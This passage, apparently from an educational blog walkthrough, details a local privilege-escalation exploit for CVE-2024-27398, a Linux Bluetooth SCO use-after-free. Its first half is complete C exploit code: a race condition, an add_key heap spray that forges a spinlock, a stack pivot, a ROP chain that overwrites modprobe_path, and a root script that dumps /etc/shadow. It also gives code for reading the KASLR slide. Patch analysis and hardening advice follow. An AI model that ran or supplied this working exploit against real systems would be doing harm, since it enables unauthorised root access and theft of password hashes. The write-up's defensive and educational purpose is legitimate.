#define SK_LOCK_OFF    0x98   /* socket_lock_t sk_lock  (pahole verified) */
#define SK_STCHG_OFF   0x338  /* sk_state_change fptr   (pahole verified) */

#define PG             4096
#define BTPROTO_HCI    1
#define BTPROTO_SCO    2
#define BATCH_SZ       2000

typedef struct { uint8_t b[6]; } __attribute__((packed)) bdaddr_t;
struct sockaddr_sco { sa_family_t f; bdaddr_t a; uint16_t t; };

/* ── vHCI state ─────────────────────────────────────────────────────── */
static int vfd;
static volatile int vstop = 0;

/* Respond to HCI commands issued by the kernel during BT stack init */
static void *vhci_thread(void *a) {
    uint8_t buf[512], resp[300], extra[248];
    struct pollfd pf = {.fd = vfd, .events = POLLIN};

    while (!vstop) {
        if (poll(&pf, 1, 100) <= 0) continue;
        int n = read(vfd, buf, sizeof(buf));
        if (n < 4 || buf[0] != 1) continue;  /* must be HCI_COMMAND_PKT */

        memset(extra, 0, sizeof(extra));
        int el = 248;
        uint16_t op = buf[1] | (buf[2] << 8);

        switch (op) {
        case 0x1001: extra[0]=11; extra[3]=11; extra[4]=10; break;
        case 0x1009: extra[0]=0xAA; extra[1]=0xBB; extra[2]=0xCC;
                     extra[3]=0xDD; extra[4]=0xEE; extra[5]=0xFF; break;
        case 0x1002: memset(extra, 0xff, 64); break;
        case 0x1003: extra[0]=0xff; extra[1]=0xff; extra[2]=0x8f;
                     extra[3]=0xfe; extra[4]=0xdb; extra[5]=0xff;
                     extra[6]=0x5b; extra[7]=0x87; break;
        case 0x1004: case 0x1005:
                     extra[0] = n > 4 ? buf[4] : 0;
                     extra[1] = 1; memset(&extra[2], 0xff, 8); break;
        case 0x100b: extra[0]=0xff; extra[1]=0x03; extra[2]=0xff;
                     extra[3]=0x0a; extra[5]=0x08; break;
        case 0x0c14: memcpy(extra, "vhci", 4); break;
        case 0x200b: case 0x200c: memset(extra, 0xff, 8); break;
        case 0x2003: extra[0]=0xfb; extra[2]=0x0f; break;
        case 0x0406: el = 8; break;

        case 0x0401: { /* HCI_Create_Connection → send Connection Complete */
            uint8_t ev[20] = {0};
            ev[0]=4; ev[1]=0x03; ev[2]=11; ev[3]=0;
            ev[4]=0x01; ev[5]=0x00;           /* handle = 1 */
            if (n >= 10) memcpy(&ev[6], &buf[4], 6);
            ev[12]=0x01; ev[13]=0x00;
            write(vfd, ev, 14);
            break;
        }
        default: el = 8; break;
        }

        int pl = 4 + el;
        if (pl > 255) pl = 255;
        resp[0]=4; resp[1]=0x0e; resp[2]=pl; resp[3]=1;
        resp[4]=buf[1]; resp[5]=buf[2]; resp[6]=0;
        if (el > 0) memcpy(&resp[7], extra, pl - 4);
        write(vfd, resp, 3 + pl);
    }
    return NULL;
}

/* ── Race threads ────────────────────────────────────────────────── */
static int g_fd;
static pthread_barrier_t g_bar;

static void *c1(void *a) {
    struct sockaddr_sco sa = {.f = AF_BLUETOOTH};  /* dst = 00:00:...:00 */
    pthread_barrier_wait(&g_bar);
    connect(g_fd, (struct sockaddr*)&sa, sizeof(sa));
    return NULL;
}

static void *c2(void *a) {
    struct sockaddr_sco sa = {.f = AF_BLUETOOTH};
    memset(&sa.a, 0xff, 6);                        /* dst = FF:FF:...:FF */
    pthread_barrier_wait(&g_bar);
    connect(g_fd, (struct sockaddr*)&sa, sizeof(sa));
    return NULL;
}

/* ── Heap spray payload ──────────────────────────────────────────── */
static char g_kd[980];

static void build_spray(void) {
    memset(g_kd, 0, sizeof(g_kd));
    int h = 24;  /* sizeof(struct user_key_payload) header */

    /*
     * Overwrite sk_lock.slock with a valid-looking unlocked spinlock.
     * bh_lock_sock() reads magic (must be 0xdead4ead) and checks
     * owner_cpu/-1. Without this, the kernel panics before reaching
     * sk_state_change.
     */
    int slock = SK_LOCK_OFF - h;   /* 0x98 - 0x18 = 0x80 */
    *(uint32_t*)(g_kd + slock + 0)  = 0;            /* raw_lock = 0 */
    *(uint32_t*)(g_kd + slock + 4)  = 0xdead4ead;   /* magic */
    *(uint32_t*)(g_kd + slock + 8)  = 0xffffffff;   /* owner_cpu = -1 */
    *(uint32_t*)(g_kd + slock + 12) = 0;
    *(uint64_t*)(g_kd + slock + 16) = (uint64_t)-1; /* owner = -1 */

    /* Overwrite sk_state_change with our stack pivot gadget */
    *(uint64_t*)(g_kd + SK_STCHG_OFF - h) = XCHG_EAX_ESP;
}

int main(void) {
    printf("=== CVE-2024-27398 LPE (SMEP BYPASS) ===\n");
    fflush(stdout);

    /* [1] Create root payload script */
    FILE *f = fopen("/tmp/x", "w");
    if (f) {
        fprintf(f,
            "#!/bin/sh\n"
            "echo '=== CVE-2024-27398 ROOT ===' > /tmp/pwn\n"
            "uname -a >> /tmp/pwn\n"
            "id >> /tmp/pwn\n"
            "echo '--- /etc/shadow ---' >> /tmp/pwn\n"
            "cat /etc/shadow >> /tmp/pwn 2>/dev/null\n"
            "echo '--- ROOTED ---' >> /tmp/pwn\n");
        fclose(f);
    }
    chmod("/tmp/x", 0755);

    /* [2] Create invalid-magic binary to trigger modprobe */
    {
        int d = open("/tmp/dummy", O_CREAT|O_WRONLY|O_TRUNC, 0755);
        if (d >= 0) { write(d, "\xff\xff\xff\xff", 4); close(d); }
    }

    /* [3] Map string page (nosmap: kernel reads this during memcpy) */
    void *sp = mmap((void*)STRING_PAGE, PG, PROT_READ|PROT_WRITE,
                    MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
    memcpy(sp, "/tmp/x", 7);

    /* [4] Map pivot page and write ROP chain */
    void *pivot_page = (void*)(PIVOT_ADDR & ~0xFFFUL);
    void *pp = mmap(pivot_page, 2*PG, PROT_READ|PROT_WRITE,
                    MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
    if (pp == MAP_FAILED) { perror("mmap pivot"); return 1; }
    memset(pp, 0, 2*PG);

    uint64_t *rop = (uint64_t*)(PIVOT_ADDR);
    rop[0] = POP_RDI_RET;
    rop[1] = MODPROBE_PATH;        /* rdi = &modprobe_path */
    rop[2] = POP_RSI_RET;
    rop[3] = STRING_PAGE;          /* rsi = "/tmp/x" (nosmap) */
    rop[4] = POP_RDX_RET;
    rop[5] = 7;                    /* rdx = 7 */
    rop[6] = MEMCPY_ADDR;          /* memcpy(modprobe_path, "/tmp/x", 7) */
    rop[7] = XCHG_EAX_ESP + 1;    /* trailing ret sled → eventual crash */

    printf("[+] Pivot page at %p, ROP at 0x%lx\n", pp, PIVOT_ADDR);
    fflush(stdout);

    /* [5] Set up vHCI and bring up hci0 */
    build_spray();
    vfd = open("/dev/vhci", O_RDWR);
    if (vfd < 0) { perror("vhci"); return 1; }
    uint8_t vp[2] = {0xff, 0};
    write(vfd, vp, 2);
    usleep(200000);

    pthread_t vt;
    pthread_create(&vt, NULL, vhci_thread, NULL);
    usleep(500000);

    int hfd = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI);
    if (hfd >= 0) { ioctl(hfd, _IOW(0x48, 201, int), 0); close(hfd); }
    sleep(4);
    printf("[*] HCI ready\n");
    fflush(stdout);

    /* [6] Main race + spray loop */
    char desc[32];
    struct timeval tv = {.tv_sec = 2};

    for (int batch = 0; batch < 100; batch++) {
        printf("[*] Batch %d\n", batch);
        fflush(stdout);

        for (int i = 0; i < BATCH_SZ; i++) {
            g_fd = socket(AF_BLUETOOTH, SOCK_SEQPACKET|SOCK_NONBLOCK,
                          BTPROTO_SCO);
            if (g_fd < 0) continue;

            setsockopt(g_fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv));

            pthread_barrier_init(&g_bar, NULL, 2);
            pthread_t t1, t2;
            pthread_create(&t1, NULL, c1, NULL);
            pthread_create(&t2, NULL, c2, NULL);
            pthread_join(t1, NULL);
            pthread_join(t2, NULL);
            pthread_barrier_destroy(&g_bar);

            close(g_fd);  /* frees sk; orphan conn_A timer still pending */

            /* Spray: try to reclaim the freed sco_pinfo slot */
            snprintf(desc, sizeof(desc), "s%d_%d", batch, i);
            syscall(__NR_add_key, "user", desc, g_kd, sizeof(g_kd),
                    KEY_SPEC_SESSION_KEYRING);
        }

        /* Wait for SO_SNDTIMEO timers to fire */
        printf("[*] Waiting 3s...\n");
        fflush(stdout);
        sleep(3);

        /* Poll: did modprobe_path get overwritten? */
        for (int t = 0; t < 5; t++) {
            system("/tmp/dummy 2>/dev/null; true");
            usleep(500000);
            if (access("/tmp/pwn", F_OK) == 0) goto win;
        }

        printf("[*] No luck this batch\n");
        fflush(stdout);
    }

    printf("[-] Done, no root\n");
    vstop = 1;
    close(vfd);
    return 0;

win:
    printf("\n[!!!] ROOT! (SMEP BYPASS)\n[*] /tmp/pwn:\n");
    fflush(stdout);
    system("cat /tmp/pwn");
    fflush(stdout);
    vstop = 1;
    close(vfd);
    return 0;
}

11. End-to-End Execution Flow

┌──────────────────────────────────────────────────────────────────────┐
│                     FULL EXPLOITATION CHAIN                          │
├──────────────────────────────────────────────────────────────────────┤
│                                                                      │
│  SETUP                                                               │
│  ├── mmap 0xdead0000 → "/tmp/x"     (string for memcpy src)        │
│  ├── mmap 0x81011000 → ROP chain      (pivot destination)            │
│  ├── build spray payload:                                            │
│  │     +0x80: spinlock magic=0xdead4ead (passes bh_lock_sock)        │
│  │     +0x320: sk_state_change=0xffffffff81011cf1 (our gadget)       │
│  └── /tmp/x, /tmp/dummy created                                      │
│                                                                      │
│  BLUETOOTH INIT                                                      │
│  ├── open /dev/vhci → virtual hci0 created                           │
│  ├── vhci_thread: answers HCI commands from kernel                   │
│  └── HCIDEVUP ioctl → hci0 UP, BT stack ready                        │
│                                                                      │
│  RACE + SPRAY LOOP (per iteration)                                   │
│  ├── socket(AF_BLUETOOTH, SEQPACKET|NONBLOCK, BTPROTO_SCO)           │
│  ├── setsockopt(SO_SNDTIMEO, 2s)                                     │
│  ├── barrier.wait → c1+c2 connect simultaneously                    │
│  │     c1 → addr 00:00:00:00:00:00 → conn_A + timer_A (2s)          │
│  │     c2 → addr FF:FF:FF:FF:FF:FF → conn_B + timer_B (2s)          │
│  │     sco_pi(sk)->conn = conn_B   (last write wins)                 │
│  ├── close(fd) → cancel_delayed_work(conn_B->timeout)               │
│  │              → conn_A timer ORPHANED, sk FREED                    │
│  └── add_key("user", desc, payload, 980, ...) → kmalloc(1004)       │
│       → kmalloc-1024 → may reclaim freed sco_pinfo slot              │
│                                                                      │
│  TIMER FIRES (workqueue, ~2s later)                                  │
│  ├── sco_sock_timeout(conn_A)                                        │
│  ├── bh_lock_sock(sk) → reads spray magic 0xdead4ead ✓              │
│  ├── sk->sk_err = ETIMEDOUT                                          │
│  └── sk->sk_state_change(sk) → jumps to 0xffffffff81011cf1          │
│                                                                      │
│  SMEP BYPASS + ROP                                                   │
│  ├── xchg eax, esp → RSP = 0x0000000081011cf1  (userspace page)     │
│  ├── pop rdi; ret → RDI = 0xffffffff8356a020   (modprobe_path)      │
│  ├── pop rsi; ret → RSI = 0x00000000dead0000   ("/tmp/x")         │
│  ├── pop rdx; ret → RDX = 7                                         │
│  ├── memcpy(modprobe_path, "/tmp/x", 7) → RAX = modprobe_path    │
│  └── ret sled → RIP = 0x0 → kernel oops (panic_on_oops=0, cont.)    │
│                                                                      │
│  ROOT TRIGGER                                                        │
│  ├── system("/tmp/dummy") → kernel: unrecognized binary format       │
│  ├── request_module("binfmt-ffffffff")                               │
│  ├── call_usermodehelper("/tmp/x", ...) → runs as UID 0             │
│  ├── /tmp/x writes "uid=0 gid=0" to /tmp/pwn                        │
│  └── access("/tmp/pwn") == 0 → ROOTED                               │
│                                                                      │
│  RESULT: unprivileged user → uid=0 gid=0 in Batch 0                 │
└──────────────────────────────────────────────────────────────────────┘
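
The size arithmetic in the spray step (a 980-byte payload plus the 24-byte user_key_payload header) can be checked with a small helper. This is a minimal sketch, assuming the general-purpose kmalloc size classes of a typical x86-64 SLUB build; `kmalloc_bucket` and `kmalloc_classes` are hypothetical names for illustration, not kernel APIs, and the class list may differ on other configurations.

```c
#include <assert.h>
#include <stddef.h>

/* Assumed general-purpose kmalloc size classes on a typical x86-64 SLUB
 * build. Illustration only; the kernel does not expose this table. */
static const size_t kmalloc_classes[] = {
    8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};

/* Return the smallest assumed size class that fits `request`,
 * or 0 if the request is larger than every listed class. */
size_t kmalloc_bucket(size_t request)
{
    assert(request > 0);
    size_t count = sizeof(kmalloc_classes) / sizeof(kmalloc_classes[0]);
    for (size_t i = 0; i < count; i++) {
        if (request <= kmalloc_classes[i])
            return kmalloc_classes[i];
    }
    return 0;
}
```

Under these assumptions, `kmalloc_bucket(980 + 24)` and `kmalloc_bucket(832)` both return 1024, which is consistent with the payload and the sco_pinfo object competing for the same size class once the caches are merged.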

12. Reliability Analysis

12.1 Spray reliability factors

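Three factors drive spray reliability. CONFIG_DEBUG_SPINLOCK=y widens the race window by inflating the structures involved. Running 2000 iterations per batch works around SLUB's per-CPU freelists: a freed slot returns to the freelist of the CPU that freed it, so a spray allocation issued on a different CPU cannot reclaim it. A large pool of iterations makes it likely that at least one spray allocation runs on the right CPU. The original article reports that root is achieved in Batch 0 in every test run.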
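
The "enough iterations" argument can be made concrete with a simple independence model. The sketch below assumes every iteration succeeds independently with the same probability p. That value is hypothetical: the original article reports no per-iteration measurement, and `p_at_least_one` is an illustrative name.

```c
#include <assert.h>

/* Probability that at least one of n independent attempts succeeds,
 * given a per-attempt success probability p: 1 - (1 - p)^n.
 * Independence is a simplifying assumption for illustration. */
double p_at_least_one(double p, unsigned n)
{
    assert(p >= 0.0 && p <= 1.0);
    double all_fail = 1.0;
    for (unsigned i = 0; i < n; i++)
        all_fail *= 1.0 - p;   /* every attempt so far has failed */
    return 1.0 - all_fail;
}
```

With a hypothetical p of 0.001 and 2000 iterations the model gives roughly 0.86, so a Batch 0 success in every run would suggest a noticeably higher per-iteration rate on the tuned lab kernel.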

12.2 What fails without the config changes

| Setting after reverting the lab change | Effect |
| --- | --- |
| `CONFIG_KASAN=y` | `SLAB_KASAN` prevents the “SCO” slab from merging with `kmalloc-1024`, so the spray never reaches the freed `sk`. KASAN also catches the UAF and prints a report; it does not prevent the oops path, but root becomes unreachable. |
| `CONFIG_MEMCG_KMEM=y` | Same outcome as KASAN: the `SLAB_ACCOUNT` mismatch prevents the merge. `add_key` allocates from `kmalloc-cg-1024` while the freed `sk` stays in the “SCO” slab. |
| `CONFIG_DEBUG_SPINLOCK=n` | `sco_pinfo` shrinks to ~832 bytes. It still lands in `kmalloc-1024`, but the race window narrows significantly and spray reliability approaches zero in testing. |
| `panic_on_oops=1` | The trailing `ret` into `RIP=0` panics the machine before the `modprobe_path` trigger can run. Working around it needs proper kernel-context cleanup or a crash-free ROP epilogue (e.g. an `iretq` or `swapgs; iretq` chain). |

Config sensitivity matrix. Source: original article.
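
From a defender's point of view, the matrix doubles as a checklist: a kernel whose configuration matches the lab settings is the easy target. The following is a minimal sketch, assuming the configuration is available as text in the usual `CONFIG_X=y` / `# CONFIG_X is not set` format (for example from /boot/config-* or a decompressed /proc/config.gz). `config_enabled` and `matches_lab_config` are hypothetical helper names.

```c
#include <assert.h>
#include <string.h>

/* Return 1 if `option` is set to y in kernel-config text, else 0.
 * A line such as "# CONFIG_KASAN is not set" counts as disabled. */
int config_enabled(const char *config_text, const char *option)
{
    assert(config_text && option);
    size_t len = strlen(option);
    const char *line = config_text;
    while (line && *line) {
        if (strncmp(line, option, len) == 0 &&
            strncmp(line + len, "=y", 2) == 0) {
            char end = line[len + 2];
            if (end == '\n' || end == '\0')
                return 1;
        }
        line = strchr(line, '\n');
        if (line)
            line++;   /* step past the newline to the next line */
    }
    return 0;
}

/* Return 1 if the config matches the lab settings from the matrix:
 * KASAN off, MEMCG_KMEM off, DEBUG_SPINLOCK on. */
int matches_lab_config(const char *config_text)
{
    return !config_enabled(config_text, "CONFIG_KASAN") &&
           !config_enabled(config_text, "CONFIG_MEMCG_KMEM") &&
           config_enabled(config_text, "CONFIG_DEBUG_SPINLOCK");
}
```

The check is deliberately narrow. It covers only the three build-time options in the matrix and says nothing about runtime settings such as panic_on_oops, which would have to be read from sysctl separately.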

12.3 KASLR

All addresses above assume nokaslr. With KASLR, the kernel base shifts on every boot by a random multiple of 2 MB (9 bits of entropy, i.e. 512 possible offsets). Handling it requires reading the address of _text from /proc/kallsyms (which needs kptr_restrict=0), subtracting the nokaslr base to get the slide, and rebasing every constant:

/* Read the slide from /proc/kallsyms (requires kptr_restrict=0) */
FILE *ks = fopen("/proc/kallsyms", "r");
uint64_t slide = 0;   /* offset from the nokaslr base, not the base itself */
/* find _text symbol → slide = addr - 0xffffffff81000000 */

/* Apply the slide to all addresses */
XCHG_EAX_ESP  = 0xffffffff81011cf1 + slide;
MODPROBE_PATH = 0xffffffff8356a020 + slide;
/* etc. */

Most Linux distributions restrict /proc/kallsyms for unprivileged users, so on hardened targets a separate info leak is required first.
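
The slide arithmetic, and the way a restricted /proc/kallsyms defeats it, can be sketched as follows. This is an illustrative example under the article's stated assumptions (nokaslr base 0xffffffff81000000, 2 MB granularity, 9 bits). The helper names are hypothetical, and the input is a single line of kallsyms text supplied by the caller.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NOKASLR_TEXT 0xffffffff81000000ULL  /* _text without KASLR, per the article */
#define SLOT_SIZE    0x200000ULL            /* 2 MB granularity */
#define SLOT_COUNT   512ULL                 /* 9 bits, per the article */

/* Parse one kallsyms line ("<hex addr> <type> <name>").
 * Returns 1 and stores the address if the line names `symbol` and the
 * address is not masked to zero; returns 0 otherwise. */
int parse_kallsyms_line(const char *line, const char *symbol, uint64_t *addr_out)
{
    unsigned long long addr;
    char name[128];
    assert(line && symbol && addr_out);
    if (sscanf(line, "%llx %*c %127s", &addr, name) != 2)
        return 0;
    if (strcmp(name, symbol) != 0 || addr == 0)
        return 0;   /* wrong symbol, or address hidden by the kernel */
    *addr_out = (uint64_t)addr;
    return 1;
}

/* Slide = observed _text address minus the nokaslr base. */
uint64_t kaslr_slide(uint64_t text_addr)
{
    assert(text_addr >= NOKASLR_TEXT);
    return text_addr - NOKASLR_TEXT;
}

/* A plausible slide is a multiple of 2 MB within the 512 assumed slots. */
int slide_is_plausible(uint64_t slide)
{
    return slide % SLOT_SIZE == 0 && slide / SLOT_SIZE < SLOT_COUNT;
}
```

When the kernel hides addresses, every line reads as zeros and `parse_kallsyms_line` returns 0. That is the situation the paragraph above describes, where an info leak becomes a prerequisite.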

13. Patch Analysis

/* BEFORE (vulnerable): timer fires against potentially freed sk */
static void sco_sock_timeout(struct work_struct *work) {
    ...
    bh_lock_sock(sk);
    sk->sk_err = ETIMEDOUT;
    sk->sk_state_change(sk);
    bh_unlock_sock(sk);
    /* no sock_put — reference was never taken */
}

/* AFTER (patched): sock_hold in sco_conn_add, sock_put here */
static void sco_sock_timeout(struct work_struct *work) {
    ...
    bh_lock_sock(sk);
    sk->sk_err = ETIMEDOUT;
    sk->sk_state_change(sk);
    bh_unlock_sock(sk);
    sock_put(sk);   /* ← paired with sock_hold() at timer schedule time */
}

/* BEFORE: cancel_delayed_work is async; timer may already be running */
sco_sock_clear_timer(sk);   /* → cancel_delayed_work(async) */
sco_chan_del(sk, err);      /* → frees sk while timer might still run */

/* AFTER: cancel_delayed_work_sync waits for running work to complete */
sco_conn_lock(conn);
sk = conn->sk;
if (sk) {
    sock_hold(sk);                      /* take reference */
    cancel_delayed_work_sync(           /* wait for timer to finish */
        &conn->timeout_work);
    sco_chan_del(sk, err);
    sock_put(sk);                       /* release reference */
}
sco_conn_unlock(conn);
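
The reference-counting half of the fix can be illustrated outside the kernel. The following is a minimal single-threaded sketch on a toy object. `toy_sock`, `toy_sock_hold`, and `toy_sock_put` are hypothetical names that only mimic the roles of sock_hold() and sock_put(); the real functions use atomic counters, and the real fix also needs the locking shown above.

```c
#include <assert.h>
#include <stdlib.h>

/* Toy stand-in for a refcounted socket; not the kernel's struct sock. */
struct toy_sock {
    int refcnt;
    int *freed_flag;   /* set to 1 when the object is released */
};

/* Allocate an object holding one reference (the file descriptor's). */
struct toy_sock *toy_sock_new(int *freed_flag)
{
    struct toy_sock *sk = malloc(sizeof(*sk));
    assert(sk && freed_flag);
    sk->refcnt = 1;
    sk->freed_flag = freed_flag;
    *freed_flag = 0;
    return sk;
}

/* Take an extra reference, e.g. on behalf of a pending timer. */
void toy_sock_hold(struct toy_sock *sk)
{
    sk->refcnt++;
}

/* Drop one reference; the object is freed only when the last one goes. */
void toy_sock_put(struct toy_sock *sk)
{
    assert(sk->refcnt > 0);
    if (--sk->refcnt == 0) {
        *sk->freed_flag = 1;
        free(sk);
    }
}
```

If the timer path calls `toy_sock_hold` before `close()` drops its reference, the first `toy_sock_put` leaves the object alive and only the timer's own `toy_sock_put` frees it. Without the extra reference, the first put frees the object while the timer still points at it, which is the use-after-free.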

Key Takeaways

The bug is a textbook callback-vs-free race: two threads create independent sco_conn objects with their own delayed-work timers, close() only cancels one, the other becomes an orphan firing against freed memory.
SLUB cache merging is what makes the spray viable: with KASAN and MEMCG_KMEM off, the “SCO” slab merges into kmalloc-1024, so a 980-byte add_key payload can reclaim the freed sco_pinfo slot.
The DEBUG_SPINLOCK magic (0xdead4ead) is the most fragile check on the path from the timer to sk_state_change — forge it correctly or the exploit dies before reaching RIP control.
SMEP is bypassed not by executing userspace code but by routing the pivot into userspace data — the ROP chain itself sits in a mmap’d userspace page that the kernel reads. SMAP being off is what allows that read.
Once memcpy(modprobe_path, "/tmp/x", 7) has run, root is one execve() of an invalid-magic binary away — the kernel itself runs the script as uid=0.
The fix in Linux 6.8.2 closes the race at three points: serialise via sco_conn_lock, hold a refcount across the timer’s lifetime, and use cancel_delayed_work_sync() instead of async cancellation.

Defensive Recommendations

Patch. Update to Linux 6.8.2 or later on any host that exposes the Bluetooth subsystem. Most distros have backported the fix — verify with git log --oneline net/bluetooth/sco.c against your kernel tree.
Disable the Bluetooth stack where it is not needed. Server / cloud / container hosts almost never need CONFIG_BT=y — build it out, or blacklist bluetooth and btusb in /etc/modprobe.d/.
Block /dev/vhci for unprivileged users. Without /dev/vhci access, no virtual-HCI exploit path. CONFIG_BT_HCIVHCI=n in the kernel, or strict ACLs on /dev/vhci.
Keep MEMCG_KMEM, KASLR, and SMAP enabled on production kernels, and KASAN on test and fuzzing builds (its overhead usually rules it out in production). Each one breaks a different stage of this chain: KASAN/MEMCG break the cache-merge spray, KASLR forces an info leak, SMAP breaks the userspace ROP-chain read.
Do not run with kptr_restrict=0. Set kernel.kptr_restrict=2 via sysctl; with it left at 0, KASLR is largely cosmetic because /proc/kallsyms leaks the base.
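Restrict the keyring spray primitive. Tune the per-user key quotas kernel.keys.maxkeys and kernel.keys.maxbytes to limit how much heap an unprivileged process can place into the cache the victim object is allocated from. The original also suggests kernel.unprivileged_userns_clone=0; note that this sysctl exists only on some distribution kernels (e.g. Debian) and does not by itself restrict add_key.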
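Monitor for modprobe_path tampering. An auditd execve rule that flags the usermode helper running anything other than /sbin/modprobe (or the configured override) is a high-signal detection for this technique. Reading /proc/sys/kernel/modprobe and comparing it with the expected value catches the overwrite itself.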
Alert on kernel oops with panic_on_oops=0. Any production host configured to not panic on a kernel oops should at least emit a high-priority alert on every oops event — this exploit (and many like it) relies on continued execution after an oops.
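
Two of the checks above (modprobe_path tampering and kptr_restrict) are simple enough to automate. The sketch below is illustrative rather than a complete monitoring tool. The helper names are hypothetical, the expected helper path is supplied by the caller, and the values are assumed to come from /proc/sys/kernel/modprobe and /proc/sys/kernel/kptr_restrict.

```c
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Read the first line of a procfs/sysctl file into buf.
 * Returns 1 on success, 0 if the file cannot be opened or read. */
int read_first_line(const char *path, char *buf, size_t size)
{
    assert(path && buf && size > 0);
    FILE *f = fopen(path, "r");
    if (!f)
        return 0;
    int ok = fgets(buf, (int)size, f) != NULL;
    fclose(f);
    return ok;
}

/* Compare the text of /proc/sys/kernel/modprobe with the path the
 * administrator expects. A trailing newline is ignored. */
int modprobe_path_expected(const char *value, const char *expected)
{
    assert(value && expected);
    size_t len = strcspn(value, "\n");
    return len == strlen(expected) && strncmp(value, expected, len) == 0;
}

/* kptr_restrict: 0 is the least restrictive setting; 1 and 2 restrict
 * what is shown. Returns 1 when the value is 1 or higher. */
int kptr_restrict_is_set(const char *value)
{
    assert(value);
    return atoi(value) >= 1;
}
```

A periodic job could call `read_first_line("/proc/sys/kernel/modprobe", buf, sizeof(buf))` and raise an alert when `modprobe_path_expected(buf, "/sbin/modprobe")` returns 0. A value such as /tmp/x, as used in this walkthrough, fails that comparison.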

Conclusion

CVE-2024-27398 is the kind of bug that looks small in the patch (move two locks, add a refcount, swap an async cancel for a sync one) but offers a generous primitive: a delayed function-pointer call into a slot the attacker can reclaim. The Secunnix walkthrough is a clean tour through every step that turns that primitive into root — race the connect, orphan the timer, spray the slot via add_key, forge a valid spinlock, pivot the kernel stack into userspace with xchg eax, esp, ROP through memcpy into modprobe_path, and let the kernel run the attacker’s script for free. The pieces that make it work this cleanly — SLUB cache merging, DEBUG_SPINLOCK widening the race, nokaslr, nosmap, panic_on_oops=0 — are exactly the pieces a hardened production kernel turns off. The technique generalises: any kernel callback whose object can be freed-and-reclaimed before the callback fires deserves the same scrutiny.

Original research, figures, code, and POC animation: “CVE-2024-27398 — Exploiting a Linux Bluetooth SCO Use-After-Free with SMEP Bypass”, Secunnix Cyber Security blog (2026-04-25, author not clearly listed). Upstream PoC: sty886/sco-race-condition. modprobe_path root technique credited by the original author to lkmidas. This English rewrite is provided for technical commentary and defender education and does not reproduce the source verbatim.